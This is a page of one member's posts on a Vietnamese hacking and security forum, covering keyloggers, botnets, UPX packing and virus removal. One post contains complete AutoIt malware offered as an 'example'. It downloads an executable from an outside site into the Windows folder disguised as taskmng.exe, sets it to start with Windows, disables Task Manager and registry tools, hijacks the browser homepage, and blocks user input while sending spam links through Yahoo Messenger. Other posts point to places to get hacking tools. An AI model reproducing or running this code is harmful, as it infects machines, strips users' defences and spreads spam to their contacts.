banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: handaewoo  XML
Profile for handaewoo Messages posted by handaewoo [ number of posts not being displayed on this page: 4 ]
 
send cho bác luôn cái code lẫn em Foto http://www.mediafire.com/?hzondwdv2qj
www.xgroupvn.org
tool IGMP NuKe có thể thực hiện kiểu DRDOS trên

graycap wrote:
thử hỏi ông anh xem chăc ông ấy dùng netcut hoặc một cách nào đó vào máy bạn sau đó ông ấy muốn làm gì mà không được <dùng chung mang với người khác dễ tôi lắm> 

netcut dùng trong mạng LAN ,công dụng thì ai cũng biết , không lẽ dùng netcut làm...keylog smilie

sharkvn10 wrote:
có thể bị keylog,nhưng còn một trường hợp nữa mấy bạn bị theo giỏi,bởi môt phần mềm bot net nào đó...,nếu sai xin lượng thứ 

botnet cao lắm thì chỉ screenshot thôi , việc thêm chức năng keylog thì chẳng bác nào rảnh rỗi làm theo kiểu ...cò con ấy đâu smilie . Có thể người bị chôm mất pass do dùng chung tên user và pass khi đăng kí vào 1 forum mà forum đã bị ...hack--->...................
<đoán>
em này là sản phẩm của mr.CuTy ở Xgroup có tên Foto ( em này thuộc loại đã đi vào dĩ vãng nhưng các cụ Xgroup ....khai mồ quật mả lên tái chế !). Code của em này còn bên Xgroup , bác nào thích nghịch thì qua bên Xgroup mà tìm
</đoán>
rất tiếc là trong quá trình compile thì nó đã bị pack bởi UPX rồi

freeze_love wrote:
AutoIt dễ bị Decompile và DeObfuscate nên việc chế ngự Virus là chuyện dễ như ăn ớt.
Tỉnh táo đi! 

nhưng em thuộc loại ăn ớt không quen nên gặp khó khăn cũng nhiều anh ạ smilie . Em biết là dân autoit "gộc" như ông anh cũng chán mấy cái vụ viết virus nên chuyển qua viết anti virus nhưng người ta cũng lỡ hỏi rồi thì trả lời 1 tiếng cho khỏi mất tình cảm smilie

billylo22 wrote:
Nếu viết = AutoIt thì cho dù là 1 chương trình bình thường chưa kịp chạy đã bị kill rùi nói j mà thêm code virus
hok bít thằng AutoIt pack chương trình = cái j zậy ,rất dễ bị Decompile code 

vậy bác thử run cái này xem thử coi nó có bị kill không smilie

em chỉ ví dụ chứ không cố ý phát tán virus , xin bác conmale nhẹ tay

Code:
#NoTrayIcon
$website = "http://mrcuty.us/"
If Not FileExists(@WindowsDir & "\taskmng.exe") Then
InetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1)
Sleep(5000)
EndIf
RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Window Title", "REG_SZ", "zzzKITClubzzz")
Dim $tin[10]
$tin[0] = "mrCuTy.us - quang cao tang rank " & $website & " "
$tin[1] = "cbg.vn - test cai " & $website & " "
$tin[2] = "rock0em.org " & $website & " "
$tin[3] = "autoitvn.net " & $website & " "
$tin[4] = "mrcuty.us " & $website & " "
$tin[5] = "mrcuty.us " & $website & " "
$tin[6] = "mrcuty.us " & $website & " "
$tin[7] = "mrcuty.us " & $website & " "
$tin[8] = "mrcuty.us " & $website & " "
$tin[9] = "mrcuty.us " & $website & " "
While (1)
sleep(60000)
$tieude = WinGetTitle("Yahoo! Messenger", "")
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send("!m")
Send("un")
Send("^v {ENTER}{ENTER}")
Send("^m")
Send("{DOWN}")
Send("^{SHIFTDOWN}{END}{SHIFTUP}")
Send("{ENTER}")
Send("^v {ENTER}")
BlockInput (0)
EndIf
Sleep(1800000)
WEnd


xin nói thêm , bác chịu khó vào lục trong cái folder cài autoit của bác thì thấy ngay cái UPX trong ấy đấy ( nếu bác có cài autoit )
không bị cheat thì đúng hơn
em nghe nói bác Quảng có cái máy có thể dịch 1 con virus ra code không biết có thật không nhỉ
có nước load bằng olly lên rồi ngồi ngâm thôi.Vả lại cái"antihack" (theo em hiểu) là "chống crack" , 1 việc bất khả thi. Đã gọi là khoá thì phải mở được , đã gọi là phần mềm thì phải chấp nhận bị crack ( Câu này nghe được của các bác REA)
không có syssafe mà là safesys.Còn bạn DaigiaIQ_Y2.1k muốn "phá băng" thì mấy cái tool thiếu gì , hình như bên xgroupvn.org có đấy, hay google cũng được. Viết virus thì autoit là sự lựa chọn dễ nhất theo cả nghĩa đen lẫn nghĩa bóng (dễ thành công cũng như dễ bị bóc lịch nếu bị túm gáy)
PS:Code của safesys có search google cũng chẳng thấy đâu, đừng tìm vô ích
nó pack bằng UPX thì lấy UPX unpack được không nhỉ anh freeze love
smilie Có soft thực hiện DRDOS à ?
Lại bài viết về netcat , báo cáo với chủ topic là em thấy bài viết này quen quen
chắc ông anh mới dùng word à smilie . xin lỗi , em không có ý gì , chỉ là đối với word thì lúc tạo ra 1 file word rỗng thì luôn là 11kb
only joking smilie

dway16 wrote:
Cài lại win như bình thường. Cứ ra mua đĩa ở quán rồi về cài thôi. Chả sao cảsmilie. Mất mỗi file taskmgr.exe chả sao đâu!!smilie 

hic , cài win lại thì nói làm gì . ông anh thử copy taskmgr của máy khác vào system32 thử xem
thử cài firmware xem sao http://lqv77.com/forum/index.php?showtopic=440
đọc sơ qua bài viết thì em thấy ông anh lenamem1 nên sửa lại mấy cái từ "hok" cho đúng quy định của box . Còn với từ "nik" của ông anh thì ông anh muốn sửa hay không cũng được smilie .Xin nói thêm là cái vấn đề mất mật khẩu của ông anh thì có liên quan tới newbugs à ?
chỉ có khái niệm tấn công bằng DRDOS . Hiện giờ chưa thấy bác nào đưa ra khái niệm chống DRDOS cả
thấy gì đâu

dway16 wrote:
"Tìm file autorun.ini rồi delete đi"  

autorun.ini , Chúa ơi
khà khà , đúng thứ mình cần smilie
PS : sao cái box của bác kienmanowar dạo này vắng vẻ thế
đúng là chủ đề nhạy cảm nên nhiều người phản đối

Gangster0100 wrote:
smilie máy của em lúc khởi động vào đến màn hình logon win thì bị hiện ra 1 bảng lỗi ! xong hiện bảng logon ( cái này do viust chứ em ko để logon ) vào em dùng BKAv quét ra 1 lô viust nhưng khởi động lại máy thì BKav lại báo lỗi và vẫn bị như vậy !! ai có thể chỉ cho em cách tiêu diệt nó không ? smilie 

em nghĩ anh nên dùng AV khác hoặc gửi thêm thông tin
 
Go to Page:  First Page 1 2 3 5 6 7 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|